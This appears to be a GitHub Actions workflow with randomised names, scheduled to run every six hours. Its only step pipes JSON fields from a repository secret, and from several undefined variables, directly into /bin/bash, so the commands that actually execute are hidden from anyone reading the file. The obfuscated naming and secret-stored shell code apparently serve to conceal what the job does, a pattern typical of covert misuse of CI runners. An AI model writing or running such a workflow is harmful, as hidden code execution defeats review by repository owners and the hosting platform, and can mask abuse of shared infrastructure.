name: makezhu9381
on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: makezhu9381
        env:
          unuyv40819: ${{ secrets.unuyv40819 }}
        run: |
          echo $unuyv40819 | jq -r .t484 | /bin/bash
          echo $ru14 | jq -r .nuuo9 | /bin/bash
          echo $n98 | jq -r .teq08 | /bin/bash
          echo $c52 | jq -r .bejlq838 | /bin/bash
          echo $kufkx23036 | jq -r .jxh6121 | /bin/bash
          echo $bb20512 | jq -r .wye2861 | /bin/bash
          echo $hmwhj3 | jq -r .c869 | /bin/bash
          echo $hu52 | jq -r .c4034 | /bin/bash
          echo $cgyu30229 | jq -r .ugaux6253 | /bin/bash

